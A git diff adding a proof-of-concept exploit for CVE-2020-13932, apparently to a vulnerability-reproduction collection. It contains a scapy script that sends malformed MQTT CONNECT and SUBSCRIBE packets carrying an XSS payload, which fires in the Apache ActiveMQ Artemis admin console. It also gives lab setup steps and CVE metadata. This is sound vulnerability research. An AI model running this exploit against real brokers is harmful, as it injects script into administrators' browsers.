diff --git a/cve/apache-activemq/2020/CVE-2020-13932/Effect.png b/cve/apache-activemq/2020/CVE-2020-13932/Effect.png
new file mode 100644
index 0000000000000000000000000000000000000000..c5a75b4931de1b4e3802bcfcc5b423909461346d
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/Effect.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png b/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png
new file mode 100644
index 0000000000000000000000000000000000000000..c78d26db7b73a8d7b9da9419f509a76345393eeb
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/Effect2.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png b/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png
new file mode 100644
index 0000000000000000000000000000000000000000..7a928e92fa711e0be5de9a90a5cb62d82dddc4bb
Binary files /dev/null and b/cve/apache-activemq/2020/CVE-2020-13932/dashboard.png differ
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
new file mode 100644
index 0000000000000000000000000000000000000000..d85d0d517cc1c81cff7b6232220daf4b64373f6c
--- /dev/null
+++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py
@@ -0,0 +1,22 @@
+import time
+import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
+
+brokerIP = "" # input the server IP here
+brokerPort = 1883 # The default listen port of MQTT is 1883
+clientid = "" #Malformed Clientid
+malformedTopic = "![](\"1.1.1.1\")
" # Malformed Topic
+
+if __name__ == '__main__':
+ connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
+ # Malformed Connect Message
+ subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+ # Malformed Subscribe Message
+ conn = socket.socket()
+ conn.connect((brokerIP, brokerPort))
+ conn.send(raw(connMessage))
+ time.sleep(1)
+ conn.send(raw(subMessage))
+ input() # Keep the MQTT Connection
+ conn.close()
diff --git a/cve/apache-activemq/2020/CVE-2020-13932/readme.md b/cve/apache-activemq/2020/CVE-2020-13932/readme.md
new file mode 100644
index 0000000000000000000000000000000000000000..07ad421bbff47d7ca7a266c15c9fed576ee53cee
--- /dev/null
+++ b/cve/apache-activemq/2020/CVE-2020-13932/readme.md
@@ -0,0 +1,76 @@
+# CVE-2020-13932 Exploit
+**Author: ZodiacLyu**
+## Description
+In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
+
+## Experimental environment
+### OS Version
+``` bash
+$ cat /etc/os-release
+NAME="Ubuntu"
+VERSION="20.04.3 LTS (Focal Fossa)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 20.04.3 LTS"
+VERSION_ID="20.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=focal
+UBUNTU_CODENAME=focal
+
+$ uname -a
+Linux ubuntu 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+
+```
+### Software
+#### Download ActiveMQ Artemis
+Apache Activemq Artemis Version: 2.12.0
+```bash
+wget https://archive.apache.org/dist/activemq/activemq-artemis/2.12.0/apache-artemis-2.12.0-bin.tar.gz
+tar -zxvf apache-artemis-2.12.0-bin.tar.gz
+```
+#### Run ActiveMQ Artemis
+*Require Java
+```bash
+cd apache-artemis-2.12.0/bin/
+./artemis create [path]
+# Then register an account for visiting the dashboard
+cd [path]/bin/
+./artemis run
+```
+## PoC
+Use the python code below to establish a connection with malformed topic subscription
+```python
+import time
+import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
+
+brokerIP = "" # input the server IP here
+brokerPort = 1883 # The default listen port of MQTT is 1883
+clientid = "" #Malformed Clientid
+malformedTopic = "" # Malformed Topic
+
+if __name__ == '__main__':
+ connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
+ # Malformed Connect Message
+ subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+ # Malformed Subscribe Message
+ conn = socket.socket()
+ conn.connect((brokerIP, brokerPort))
+ conn.send(raw(connMessage))
+ time.sleep(1)
+ conn.send(raw(subMessage))
+ input() # Keep the MQTT Connection
+ conn.close()
+```
+Keep the PoC program running and visit the dashboard(localhost:8161)
+
+Visit "Management Console" -> "Artemis" -> "Diagram"
+
+The pop-up window indicates that the attack is successful.
+Also, if move the cursor to the node of malformed connection, the pop-up window will appear as well
+
+Such Vulnerability provides an attack surface for XSS.
\ No newline at end of file
diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..1fa394da1d749c426810537db355ad59ff282b79
--- /dev/null
+++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-13932
+source: Original
+info:
+ name: Apache ActiveMQ Artemis Clientid XSS
+ severity: Medium
+ description: |
+ In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.
+ scope-of-influence:
+ Apache ActiveMQ Artemis 2.5.0 to 2.13.0
+ reference:
+ https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+ https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
+ https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-13932
+ cwe-id: CWE-79
+ cnvd-id: None
+ kve-id: None
+ tags: XSS
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index fb3646724f90d27fed61ad954624870a4e5e07c8..74e40e541e354bfe7fb2575d757969493ed9df1c 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -6,6 +6,8 @@ cve:
- CVE-2021-42013
apache-APISIX:
- CVE-2022-24112
+ apache-activemq:
+ - CVE-2020-13932
apache-CouchDB:
- CVE-2022-24706
apache-solr: